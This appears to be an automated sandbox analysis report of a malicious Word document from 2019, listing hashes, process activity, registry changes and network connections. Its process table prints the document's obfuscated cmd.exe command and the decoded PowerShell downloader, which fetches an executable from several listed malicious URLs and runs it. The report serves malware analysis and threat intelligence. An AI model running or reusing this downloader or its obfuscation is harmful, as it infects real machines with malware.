| File name: | 3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a |
| Full analysis: | https://app.any.run/tasks/88dd88aa-5198-48ed-9c06-8e0a1de038a6 |
| Verdict: | Malicious activity |
| Analysis date: | January 10, 2019, 14:53:50 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 10 16:20:00 2018, Last Saved Time/Date: Mon Dec 10 16:20:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0 |
| MD5: | 3250C02D2B234C6E346DA65EC5B6E1F7 |
| SHA1: | E7F828C025BBC3FB6C959CE61C6B384712C58235 |
| SHA256: | 3B3DCE32F973F3754B3F4C06C9C1274232776E3795EB8AF038F8E06B5F513A0A |
| SSDEEP: | 1536:Gt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9slK1T5SU2T/:08GhDS0o9zTGOZD6EbzCdN15SUi |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2984)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2984)
Executes PowerShell scripts
- cmd.exe (PID: 2676)
SUSPICIOUS
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3940)
- cmd.exe (PID: 2676)
- cmd.exe (PID: 2504)
- cmd.exe (PID: 3108)
Application launched itself
- cmd.exe (PID: 2504)
Creates files in the user directory
- powershell.exe (PID: 932)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2984)
Creates files in the user directory
- WINWORD.EXE (PID: 2984)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:12:10 16:20:00 |
| ModifyDate: | 2018:12:10 16:20:00 |
| Pages: | 1 |
| Words: | 2 |
| Characters: | 12 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 13 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
40
Monitored processes
9
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 932 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2504 | CmD /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2636 | C:\Windows\system32\cmd.exe /S /D /c" echo $zQW='Ohw';$KQz=new-object Net.WebClient;$ILr='http://www.icarzone.com/Gepc2iZ@http://santaya.net/W1WB0BuP3Q@http://innovad.nl/s2YGVCqe@http://robwalls.com/6cS4MK9Vz@http://scottmazza.com/cpZVGKIzb'.Split('@');$DXA='RSQ';$bQV = '161';$sVt='mjT';$iPj=$env:temp+'\'+$bQV+'.exe';foreach($VLK in $ILr){try{$KQz.DownloadFile($VLK, $iPj);$Rio='iSS';If ((Get-Item $iPj).length -ge 80000) {Invoke-Item $iPj;$Enu='jrb';break;}}catch{}}$jhz='jjP';" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2676 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^|findstr ellX') DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3108 | C:\Windows\system32\cmd.exe /c assoc|findstr ellX | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3336 | C:\Windows\system32\cmd.exe /S /D /c" assoc" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3392 | findstr ellX | C:\Windows\system32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3940 | c:\wYAuLnHwQ\OPkulkQKDpm\FBZbkIHdJsHiS\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
1 338
Read events
943
Write events
390
Delete events
5
Modification events
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | y2, |
Value: 79322C00A80B0000010000000000000000000000 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1311375383 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311375504 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311375505 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: A80B00000C77E055F4A8D40100000000 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | s3, |
Value: 73332C00A80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | s3, |
Value: 73332C00A80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2984) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6F9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6B2US3NFZGYOAQYMKLSR.temp | — | |
MD5:— | SHA256:— | |||
| 2984 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f560.TMP | binary | |
MD5:— | SHA256:— | |||
| 2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc | pgc | |
MD5:— | SHA256:— | |||
| 932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
932 | powershell.exe | GET | — | 103.41.233.137:80 | http://www.icarzone.com/Gepc2iZ | CN | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
932 | powershell.exe | 103.41.233.137:80 | www.icarzone.com | Cloud Computing Corporation | CN | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.icarzone.com |
| malicious |